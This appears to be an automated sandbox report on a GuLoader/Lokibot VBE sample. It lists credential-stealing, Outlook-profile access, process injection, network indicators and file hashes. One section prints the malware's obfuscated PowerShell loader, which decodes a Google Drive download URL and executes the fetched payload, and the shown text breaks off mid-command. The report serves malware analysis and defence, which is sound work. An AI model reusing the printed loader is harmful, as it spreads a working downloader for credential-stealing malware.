Malware Analysis Report

2024-11-30 23:46

Sample ID: 240917-m4jr2azakh
Target: A beérkezett kérelem visszaigazolása.vbe
SHA256: b340106056e1f66bc231f34fa020dde1bc782b4bff01ab3693a56e03f233b629
Tags: guloader lokibot collection credential_access discovery downloader spyware stealer trojan
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: b340106056e1f66bc231f34fa020dde1bc782b4bff01ab3693a56e03f233b629

Threat Level: Known bad

The file A beérkezett kérelem visszaigazolása.vbe was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

outlook_win_path

outlook_office_path

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-09-17 11:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-09-17 11:01

Reported: 2024-09-17 11:03

Platform: win7-20240708-en

Max time kernel: 145s

Max time network: 147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Accesses Microsoft Outlook profiles

collection
Description | Indicator | Process | Target
--- | --- | --- | ---
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
--- | --- | --- | ---
PID 2592 set thread context of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
--- | --- | --- | ---
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\windows mail\wabmig.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
--- | --- | --- | ---
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
--- | --- | --- | ---
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
--- | --- | --- | ---
PID 1288 wrote to memory of 2228 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2228 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2228 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2884 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2228 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 2608 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2592 wrote to memory of 2696 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2696 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2696 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2696 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 2592 wrote to memory of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe
PID 2592 wrote to memory of 2536 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description | Indicator | Process | Target
--- | --- | --- | ---
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

outlook_win_path

Description | Indicator | Process | Target
--- | --- | --- | ---
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wabmig.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Windows\system32\cmd.exe

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roborate.Uns && echo t"

C:\Program Files (x86)\windows mail\wabmig.exe

"C:\Program Files (x86)\windows mail\wabmig.exe"

Network

Country | Destination | Domain | Proto
--- | --- | --- | ---
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.179.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 142.250.187.225:443 | drive.usercontent.google.com | tcp
GB | 142.250.179.238:443 | drive.google.com | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 142.250.187.227:80 | c.pki.goog | tcp
US | 8.8.8.8:53 | o.pki.goog | udp
GB | 142.250.187.227:80 | o.pki.goog | tcp
GB | 142.250.187.225:443 | drive.usercontent.google.com | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 2.16.170.49:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.microsoft.com | udp
GB | 95.100.245.144:80 | www.microsoft.com | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp
NL | 104.248.205.66:80 | | tcp

Files

memory/2228-4-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp

memory/2228-6-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2228-7-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

memory/2228-8-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-9-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-11-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-10-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2228-13-0x000007FEF57AE000-0x000007FEF57AF000-memory.dmp

memory/2228-14-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MUY8W4GYUVBPBGDJ5YBD.temp

MD5 c00f80b16eb64dad6c0b178c6799af96
SHA1 dfaa542e859d5b658181e0bc2b7f370cdbbefe6b
SHA256 e7554ce12bfd0ac902d3fc7ffa3d05b670e8eaa3a8a94b8cd8d6a6a1cd284030
SHA512 bec6dbe0f8bb0ed9809447c530db33331f8ac99efd55ccecd0aec833318f07a16e4daa4ecfa177f487fadbfe786e2f920787bc61905bc243293b032495e904bb

C:\Users\Admin\AppData\Roaming\Roborate.Uns

MD5 0b4940908143e7fa3180389a9b914557
SHA1 50985967f0dd7d2d8fdac35c66e6c066aba58aaf
SHA256 6e7664ac02af1fef33611b5150c64e285ca5c5bfda5bd555299c6df7b41f4d22
SHA512 eae1f4f22060ae85a31013cf9b904429e914018188eb519135e9ee747ff35b6a6426f665cd61cfb8724908658d11e80deb483901f4357c10cb5d207cb352e299

memory/2592-19-0x0000000006650000-0x00000000099F6000-memory.dmp

memory/2536-20-0x00000000008A0000-0x0000000003C46000-memory.dmp

memory/2536-41-0x0000000000400000-0x0000000000581000-memory.dmp

memory/2228-43-0x000007FEF54F0000-0x000007FEF5E8D000-memory.dmp

memory/2536-42-0x00000000008A0000-0x0000000003C46000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1506706701-1246725540-2219210854-1000\0f5007522459c86e95ffcc62f32308f1_62dc4f69-4699-4b35-9f5c-cc69254f52a3

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 11:01

Reported

2024-09-17 11:03

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3008 set thread context of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\windows mail\wabmig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wabmig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2452 wrote to memory of 4424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2452 wrote to memory of 4424 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4424 wrote to memory of 4748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 4748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4424 wrote to memory of 1992 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1992 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1992 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 1332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 1332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe
PID 3008 wrote to memory of 3332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wabmig.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wabmig.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\A beérkezett kérelem visszaigazolása.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sulfamidic Gavelling Distributrnettet Torturingly Begunstige Confessionalism Crawley #>;$Ratebetalingsntercommunication='Humrforladtes';<#turnhalle Drouths Resistable Lighedspunkt Olu #>;$Ratebetalingsnteressefelt=$host.PrivateData;If ($Ratebetalingsnteressefelt) {$Didymitis++;}function Germania($Barnligt){$Citraternes142=$Barnligt.Length-$Didymitis;for( $Ratebetalings=5;$Ratebetalings -lt $Citraternes142;$Ratebetalings+=6){$Bladmaver+=$Barnligt[$Ratebetalings];}$Bladmaver;}function Talekanalen($Hjertebaandets){ & ($Remans) ($Hjertebaandets);}$Dermoreaction=Germania 'Fo urM He.toL giczCh lciSt yglmethol Sanda,xagg/Nonac5 ogn. Pole0ove.g Sa tl( HypoWS.mteiDruesnAfskidFremfo D giw SoubsSafir SkydeNKtterT,ylvt Inve1Lyso,0 lodt.Enami0Recur;Unrob Miz aWObl viMucednSilki6 Syre4Count;Fi ma ,eskxUdlej6Stnin4Catac;Perso Di.nfrUndisvSundh:Highh1U ion2Asy e1Tingh.Carra0Appr )Pikan .etsmGUdsaveMoistcForovk liosoForar/Unmil2Unpre0 ba a1Still0Swoon0T lre1Slage0 Ekse1 Aug ,utaFSubheiBr.ebrcholteHospif UartoKry,rxCofa /t kis1Nonpe2 bast1Intre. 
land0 vden ';$Ostealgia=Germania ' AlecUopt.gsNonseeTruckRglott- udieAOveraGRead EFeyesn D,miTRec l ';$Aerosiderolite=Germania 'FoundhLnpost Tehatart.rp be hsHeadr:Fem r/Hyper/Varmed ildr EnetiDrv yvK proeTrito.Ciss gMllesoMan eoTwop g HypolWieraeRegne.brndbcraakooLy phmDeuto/ReturuGispecF odh?KoloneGre.nxInfrepFuldaoLse rrZoophtBensk=BekosdUn onoSammewEctronVavasl AssuoFlageaArbejdnonme&R gioireassdPlanc=Pendl1SplenhEmbas3Ar owUKa.acp ildLDaareFforkmJBackwEPat lzAr ejo MelgG tinsrEsophSOrg,nvP rhaQSynsvRShiveqko stZUnderD egnf5 KvadMRedniUStudeuDyrenGreparb GonodA,cur3ArbouS Sa.tZ revaGPriviVAkkumSDupli ';$Datamaskinelles=Germania ' arce>melle ';$Remans=Germania 'RiddeIOutuseSu.erXGenti ';$Transmits='Dani';$Helhesten147 = Germania 'Me hjeRainfc Varih KoleoDupli Adels%EnthuaTrimnpTr.lnp.arvedTro ra.nwout Ciroa Perp% Il p\ EuctRHeraco Perob Enklo,jaltr otaa R,dgtUndereBivir.skat,UAutoinAn ihs Sprn Arbor&Salme&Water KanoneAlgaec.epiahHfligo lori Ass,ctBullb ';Talekanalen (Germania 'C eck$A damgTartel NutroMarnab ,upeaRanchlBnh e: YderGomstbaUnirrlEtn ge rrepnFaktoiSektetHelafeAl issRacem6,ispe9Ugand=Immes(S pplcT.kmlmSm ltdFored Beco,/Susp cMa hi Bumse$FastiH k lteSoapmlOpsonh.ilfleBasonsHy ektInco.eBes fnHns.r1Forge4Parmi7Sidia) Adon ');Talekanalen (Germania 'undko$RomavgFrag l RecaoLikv bEnchaaArbe.lKra,e:.tateOChevyufalsttSkrivsC mbup Par,aCratonGallesdiscr=Super$ UsikAGeodteOd.nsr Ant.oCribbsSpooniVirtudChicoekollerveksloUd,ollSlidsiHeltitLympheLyng . Ob us trep Cardlfuldbi L vetLaic,(Snegl$Un erD.odesaE.doctKropsaEnmarmRefraaHjlp sU.malkMetafi SrinnAcrobeTr.djl TraplImmoreUddansDemar)B lli ');Talekanalen (Germania 'Toned[SatinN ravmeOldfatPosth.DemokSF edaeIldskrFlyvevFrag.iR bidcViolieS.rapPDelegoMesmeiTrngsn ivertDy epMRepolaBemoun.amilaDummygCissoePanadrSp in]rdlig:Gavst:Hk.enSUnfeleBlegdcHalvfuE.orbrStartiSq,artTaktfy ubisPUnimirChrysojubustrem uoHippocPara oCosmolSyndi ecur=pu.le Spe c[ Imp NSol ie HebdtLetfa. 
CounSEgomaeUrinic RetsuYmperrProz iTe,mitAdapty PneuPOphidr T deo ArtetBill o tedfcPara o Forsl AnthTFo giy Consp Kn teS esk] Spin:Land :OutsoTCompalKropesMetap1Clyde2Disc ');$Aerosiderolite=$Outspans[0];$Superhistorical= (Germania 'Ge,yt$StorrgSvinelA.matO HypobSl.taA indl rif:N.ndiRSupraEGe,eiUD,fectDaaseI An elAscriiJ.ylesRembuI BagsNMalicgTripa=BirdsN Ops.E CintWMisco-T ombO NrinBVammeJnanniE CapacAmbleTAtten BjrkesTautoy ritcsSkilltFamoue wungm Vulv.Part.n LangeFleett Ydel. b.dwwKnfale PladBTryllC SideLSign I Kamme.pasmNUnr,pt');$Superhistorical+=$Galenites69[1];Talekanalen ($Superhistorical);Talekanalen (Germania 'Ch,et$forktRSlimmeDe.tsu EnketReobsiChlorl rocriDekorsUrethiDecyln Brang Stip. SprjHKatteeElemhaGuilfdBru ee SoverRew dsModfo[Kniks$ edraOBand skberntStatse nrasa ForblSo,acgMyrrhiLudolaBolth]Ove,b=Cryst$AntisDMaggieOpstnr c ramMultioVerdir PreyeEre oa ippecFunkttWindoiTrus.oUs.ornC,rne ');$Innest=Germania 'Desmo$ProviRDe igeAnisbuAdjutt Kar iBib,ilBadg.iNrsynsOrgani SekunPretagRe zi.OverdD.uftfoL kalwmanihn AsfmlMatrioJordba Hyald KosmF,lathi NonilBegree Ridg( part$barnaAM.sabeHorserP pilo Klges BrseiSke ldU aeneBarserTeleooDel,glSan,tiNavnltko mae Espa,Unath$ ErinMHampeeVegstrSekstoEf ulpRaadmi SupeaCompusHolla),ruta ';$Meropias=$Galenites69[0];Talekanalen (Germania 'He.mi$OverbGStikllEnligOso erBFeti,aP,efoLUefte:kulsoPSpknilKugleeSuperCPr sit Del,R .imaE Spor=Borup(MadagTMe,iaeEye oSGuldaTUefte-AnkomPAr,olANonentE helhSnob Rid,e$Dechem Ul,reN,rmaRIdnhkOFrostPFinjuiDenizABe iasSu,ps)Straf ');while (!$Plectre) {Talekanalen (Germania 'Cockn$ Ind.g OrielOd ntoSemi,bVr.ihaUnderl onna:HimmeBSensaoMalobrtrgretuntorlDim noFibrod etad L akeSuperrMet p=fr mk$FilostDisplrDupwaubyggeePhala ') ;Talekanalen $Innest;Talekanalen (Germania 'SyzygSFl.rttFu hia entrrSjlfutKopie-Ca vaSCivi l ,cieeIodo.eRingvpTredv Virre4Forud ');Talekanalen (Germania 'Fremt$StiktgPr aclKattioHydribUbehaaFrnnelClino: SkipPByguelTropieBrn,ec DiabtShemir Cavee 
Hand=Abiet(AmbolTSabl.eRehidsVov htAmmod-For rPMyofiaPiotetU neahSnegl Puff $SplinMJawtwe AntirFr vloSpitepatt niCo.ntaGlottsU ork)Skip ') ;Talekanalen (Germania 'Aphod$HoboigCy,tol Almbo.ekatbre teaS okklKnowi:SlaaeFskjoreBas.bcReferuGlgninBa bldPamp,aSkumgtGligaiGr skoSterlnVulpe= S or$phallgu clol Chono IndibRvesaaPussll Bevi: Sv tVCircue ortsr nodb ytmia UngalPol.iiDermazFrysee Feus+Fitti+Staff% .orm$ In,aO Vagtu DgndtSljens,rfabpHandsaTaut.nSt lds Rels.BackrcSkorpoLsgnguSe imn onktSpeci ') ;$Aerosiderolite=$Outspans[$Fecundation];}$Afskumningernes=320006;$Fragtraterne=29409;Talekanalen (Germania ' Endo$ VrksgFabullWetcho Its b Opt.aAmarylEksku:.kikkv.ndryaPedalaSnurpbPentae Ta.inFiffis KompmCalamuCul eg Telel dmugirigsanAt ragmi ros Ness Samp=Bevir NonsGAgoraeDublet eks-forsiCtineioDr ukn .glitMa cae ilbanVejentQuara Gedeh$ParocM CocheFinkmrQidnooSmertpLalpai UncaaOu,grsStrsk ');Talekanalen (Germania 'Glaum$VendigCreatl.oddeoMrk,pbBeaanaMentalWobl :SteriDBor ojForbivBilfoethermlskralsDo nwk,ncomeIn stsDe re Af.an=Shoes Kabin[LimfaS SavkyLaborsBatiktDetoneriddlmudp r.Eq iaCP ehaoSp ldnErganv Drape Cicar orldtPsi,o]Adj d:Jus i:AstraFUnvisrRe ieoBorgemReserBFirmaaStedesofficePref,6Impr,4Ma orSNonsutBarchrNyhediLnpronPossig elfr(humid$ t anvRe,isa TimoaPontibBorgeeVagtsnIntersRammemsmkreu,phthgGlyoxlFunktiAlsi.nP.ocegRecapsstruk)Adun ');Talekanalen (Germania 'Ragin$autofgPrecolKukstoSor ib C noa ollalPhosp:J.ledDAspiryScourrAlde,t ,yppi Videdsherie forhrOktaenVred eKron. 
